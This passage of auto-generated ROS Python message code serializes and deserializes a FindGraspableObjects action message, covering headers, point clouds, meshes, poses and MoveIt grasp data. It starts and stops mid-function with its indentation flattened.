buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
_x = self
buff.write(_get_struct_B2I().pack(_x.action_feedback.feedback.object.object.point_cluster.is_bigendian, _x.action_feedback.feedback.object.object.point_cluster.point_step, _x.action_feedback.feedback.object.object.point_cluster.row_step))
_x = self.action_feedback.feedback.object.object.point_cluster.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_feedback.feedback.object.object.point_cluster.is_dense
buff.write(_get_struct_B().pack(_x))
length = len(self.action_feedback.feedback.object.object.primitives)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.primitives:
_x = val1.type
buff.write(_get_struct_B().pack(_x))
length = len(val1.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.dimensions.tostring())
length = len(self.action_feedback.feedback.object.object.primitive_poses)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.primitive_poses:
_v217 = val1.position
_x = _v217
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v218 = val1.orientation
_x = _v218
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.action_feedback.feedback.object.object.meshes)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.meshes:
length = len(val1.triangles)
buff.write(_struct_I.pack(length))
for val2 in val1.triangles:
buff.write(val2.vertex_indices.tostring())
length = len(val1.vertices)
buff.write(_struct_I.pack(length))
for val2 in val1.vertices:
_x = val2
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
length = len(self.action_feedback.feedback.object.object.mesh_poses)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.mesh_poses:
_v219 = val1.position
_x = _v219
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v220 = val1.orientation
_x = _v220
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
buff.write(self.action_feedback.feedback.object.object.surface.coef.tostring())
length = len(self.action_feedback.feedback.object.grasps)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.grasps:
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v221 = val1.pre_grasp_posture
_v222 = _v221.header
_x = _v222.seq
buff.write(_get_struct_I().pack(_x))
_v223 = _v222.stamp
_x = _v223
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v222.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v221.joint_names)
buff.write(_struct_I.pack(length))
for val3 in _v221.joint_names:
length = len(val3)
if python3 or type(val3) == unicode:
val3 = val3.encode('utf-8')
length = len(val3)
buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
length = len(_v221.points)
buff.write(_struct_I.pack(length))
for val3 in _v221.points:
length = len(val3.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.positions.tostring())
length = len(val3.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.velocities.tostring())
length = len(val3.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.accelerations.tostring())
length = len(val3.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.effort.tostring())
_v224 = val3.time_from_start
_x = _v224
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v225 = val1.grasp_posture
_v226 = _v225.header
_x = _v226.seq
buff.write(_get_struct_I().pack(_x))
_v227 = _v226.stamp
_x = _v227
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v226.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v225.joint_names)
buff.write(_struct_I.pack(length))
for val3 in _v225.joint_names:
length = len(val3)
if python3 or type(val3) == unicode:
val3 = val3.encode('utf-8')
length = len(val3)
buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
length = len(_v225.points)
buff.write(_struct_I.pack(length))
for val3 in _v225.points:
length = len(val3.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.positions.tostring())
length = len(val3.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.velocities.tostring())
length = len(val3.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.accelerations.tostring())
length = len(val3.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.effort.tostring())
_v228 = val3.time_from_start
_x = _v228
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v229 = val1.grasp_pose
_v230 = _v229.header
_x = _v230.seq
buff.write(_get_struct_I().pack(_x))
_v231 = _v230.stamp
_x = _v231
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v230.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v232 = _v229.pose
_v233 = _v232.position
_x = _v233
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v234 = _v232.orientation
_x = _v234
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_x = val1.grasp_quality
buff.write(_get_struct_d().pack(_x))
_v235 = val1.pre_grasp_approach
_v236 = _v235.direction
_v237 = _v236.header
_x = _v237.seq
buff.write(_get_struct_I().pack(_x))
_v238 = _v237.stamp
_x = _v238
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v237.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v239 = _v236.vector
_x = _v239
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v235
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v240 = val1.post_grasp_retreat
_v241 = _v240.direction
_v242 = _v241.header
_x = _v242.seq
buff.write(_get_struct_I().pack(_x))
_v243 = _v242.stamp
_x = _v243
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v242.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v244 = _v241.vector
_x = _v244
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v240
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v245 = val1.post_place_retreat
_v246 = _v245.direction
_v247 = _v246.header
_x = _v247.seq
buff.write(_get_struct_I().pack(_x))
_v248 = _v247.stamp
_x = _v248
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v247.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v249 = _v246.vector
_x = _v249
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v245
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_x = val1.max_contact_force
buff.write(_get_struct_f().pack(_x))
length = len(val1.allowed_touch_objects)
buff.write(_struct_I.pack(length))
for val2 in val1.allowed_touch_objects:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.Struct('<I%ss'%length).pack(length, val2))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.action_goal is None:
self.action_goal = grasping_msgs.msg.FindGraspableObjectsActionGoal()
if self.action_result is None:
self.action_result = grasping_msgs.msg.FindGraspableObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = grasping_msgs.msg.FindGraspableObjectsActionFeedback()
end = 0
_x = self
start = end
end += 12
(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.goal_id.id = str[start:end]
_x = self
start = end
end += 13
(_x.action_goal.goal.plan_grasps, _x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_B3I().unpack(str[start:end])
self.action_goal.goal.plan_grasps = bool(self.action_goal.goal.plan_grasps)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.text = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.objects = []
for i in range(0, length):
val1 = grasping_msgs.msg.GraspableObject()
_v250 = val1.object
_v251 = _v250.header
start = end
end += 4
(_v251.seq,) = _get_struct_I().unpack(str[start:end])
_v252 = _v251.stamp
_x = _v252
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v251.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v251.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v250.name = str[start:end].decode('utf-8', 'rosmsg')
else:
_v250.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v250.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
_v250.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.properties = []
for i in range(0, length):
val3 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.value = str[start:end]
_v250.properties.append(val3)
_v253 = _v250.point_cluster
_v254 = _v253.header
start = end
end += 4
(_v254.seq,) = _get_struct_I().unpack(str[start:end])
_v255 = _v254.stamp
_x = _v255
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v254.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v254.frame_id = str[start:end]
_x = _v253
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v253.fields = []
for i in range(0, length):
val4 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val4.name = str[start:end]
_x = val4
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v253.fields.append(val4)
_x = _v253
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v253.is_bigendian = bool(_v253.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v253.data = str[start:end]
start = end
end += 1
(_v253.is_dense,) = _get_struct_B().unpack(str[start:end])
_v253.is_dense = bool(_v253.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.primitives = []
for i in range(0, length):
val3 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val3.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v250.primitives.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.primitive_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v256 = val3.position
_x = _v256
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v257 = val3.orientation
_x = _v257
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v250.primitive_poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.meshes = []
for i in range(0, length):
val3 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.triangles = []
for i in range(0, length):
val4 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)
val3.triangles.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val3.vertices.append(val4)
_v250.meshes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.mesh_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v258 = val3.position
_x = _v258
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v259 = val3.orientation
_x = _v259
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v250.mesh_poses.append(val3)
_v260 = _v250.surface
start = end
end += 32
_v260.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.grasps = []
for i in range(0, length):
val2 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.id = str[start:end]
_v261 = val2.pre_grasp_posture
_v262 = _v261.header
start = end
end += 4
(_v262.seq,) = _get_struct_I().unpack(str[start:end])
_v263 = _v262.stamp
_x = _v263
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v262.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v262.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v261.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v261.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v261.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v264 = val4.time_from_start
_x = _v264
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v261.points.append(val4)
_v265 = val2.grasp_posture
_v266 = _v265.header
start = end
end += 4
(_v266.seq,) = _get_struct_I().unpack(str[start:end])
_v267 = _v266.stamp
_x = _v267
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v266.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v266.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v265.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v265.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v265.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v268 = val4.time_from_start
_x = _v268
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v265.points.append(val4)
_v269 = val2.grasp_pose
_v270 = _v269.header
start = end
end += 4
(_v270.seq,) = _get_struct_I().unpack(str[start:end])
_v271 = _v270.stamp
_x = _v271
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v270.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v270.frame_id = str[start:end]
_v272 = _v269.pose
_v273 = _v272.position
_x = _v273
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v274 = _v272.orientation
_x = _v274
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val2.grasp_quality,) = _get_struct_d().unpack(str[start:end])
_v275 = val2.pre_grasp_approach
_v276 = _v275.direction
_v277 = _v276.header
start = end
end += 4
(_v277.seq,) = _get_struct_I().unpack(str[start:end])
_v278 = _v277.stamp
_x = _v278
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v277.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v277.frame_id = str[start:end]
_v279 = _v276.vector
_x = _v279
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v275
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v280 = val2.post_grasp_retreat
_v281 = _v280.direction
_v282 = _v281.header
start = end
end += 4
(_v282.seq,) = _get_struct_I().unpack(str[start:end])
_v283 = _v282.stamp
_x = _v283
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v282.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v282.frame_id = str[start:end]
_v284 = _v281.vector
_x = _v284
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v280
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v285 = val2.post_place_retreat
_v286 = _v285.direction
_v287 = _v286.header
start = end
end += 4
(_v287.seq,) = _get_struct_I().unpack(str[start:end])
_v288 = _v287.stamp
_x = _v288
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v287.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v287.frame_id = str[start:end]
_v289 = _v286.vector
_x = _v289
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v285
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val2.max_contact_force,) = _get_struct_f().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
val2.allowed_touch_objects.append(val3)
val1.grasps.append(val2)
self.action_result.result.objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.support_surfaces = []
for i in range(0, length):
val1 = grasping_msgs.msg.Object()
_v290 = val1.header
start = end
end += 4
(_v290.seq,) = _get_struct_I().unpack(str[start:end])
_v291 = _v290.stamp
_x = _v291
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v290.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v290.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.properties = []
for i in range(0, length):
val2 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.value = str[start:end]
val1.properties.append(val2)
_v292 = val1.point_cluster
_v293 = _v292.header
start = end
end += 4
(_v293.seq,) = _get_struct_I().unpack(str[start:end])
_v294 = _v293.stamp
_x = _v294
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v293.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v293.frame_id = str[start:end]
_x = _v292
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v292.fields = []
for i in range(0, length):
val3 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
_x = val3
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v292.fields.append(val3)
_x = _v292
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v292.is_bigendian = bool(_v292.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v292.data = str[start:end]
start = end
end += 1
(_v292.is_dense,) = _get_struct_B().unpack(str[start:end])
_v292.is_dense = bool(_v292.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitives = []
for i in range(0, length):
val2 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val2.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
val1.primitives.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitive_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v295 = val2.position
_x = _v295
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v296 = val2.orientation
_x = _v296
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.primitive_poses.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.meshes = []
for i in range(0, length):
val2 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.triangles = []
for i in range(0, length):
val3 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val3.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)
val2.triangles.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val2.vertices.append(val3)
val1.meshes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.mesh_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v297 = val2.position
_x = _v297
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v298 = val2.orientation
_x = _v298
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.mesh_poses.append(val2)
_v299 = val1.surface
start = end
end += 32
_v299.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)
self.action_result.result.support_surfaces.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.text = str[start:end]
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.header.seq, _x.action_feedback.feedback.object.object.header.stamp.secs, _x.action_feedback.feedback.object.object.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
